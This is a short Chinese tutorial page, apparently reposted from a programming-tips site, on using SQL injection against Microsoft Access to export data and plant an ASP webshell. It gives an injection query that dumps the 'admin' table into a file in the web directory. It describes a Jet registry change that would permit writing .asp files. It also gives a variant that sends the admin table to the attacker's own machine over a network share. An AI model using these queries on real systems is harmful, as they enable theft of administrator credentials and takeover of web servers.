SQL注入Access导出WebShell?

somairi

somairi

2016-02-19 15:51

下面图老师小编跟大家分享一个简单易学的SQL注入Access导出WebShell?教程,get新技能是需要行动的,喜欢的朋友赶紧收藏起来学习下吧!

已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。

最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。

几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txt、htm、html等格式)的方法: 

SELECT * into [test.txt] in 'd:web' 'text;' from admin

执行上述语句,在d:web目录下就会生成test.txt文件,其内容就是表admin的内容。但是导出asp格式就不行,会说“不能更新,数据库或对象为只读”。

(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/bianchengyuyan/)

其实控制导出文件后缀是存储在注册表的,具体键值是HKEY_LOCALMACHINESoftwareMicrosoftJet4.0EnginesTextDisableExtension,默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”,如果我们把asp也添加进去的话,呵呵,就可以导出asp格式的文件了。

这个方法跟那个调用Access的Shell函数执行命令一样,要修改注册表,所以利用不是很大。

(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/bianchengyuyan/)

顺便提一下,前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦:SELECT * into [test.txt] in 'youripshare' 'text;' from admin

展开更多 50%)
分享

猜你喜欢

SQL注入Access导出WebShell?

编程语言 网络编程
SQL注入Access导出WebShell?

用ASP实现从SQL Server导出数据到Access

ASP
用ASP实现从SQL Server导出数据到Access

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

SQL注入攻击通杀

SQLServer
SQL注入攻击通杀

sql注入防范方法

ASP
sql注入防范方法

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

防范SQL注入式攻击

SQLServer
防范SQL注入式攻击

精妙的SQL和SQL SERVER 与ACCESS、EXCEL的数据导入导出转换

编程语言 网络编程
精妙的SQL和SQL SERVER 与ACCESS、EXCEL的数据导入导出转换

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

Win10快速删除多余系统应用的方法

Win10快速删除多余系统应用的方法

用Java连接Access

用Java连接Access
下拉加载更多内容 ↓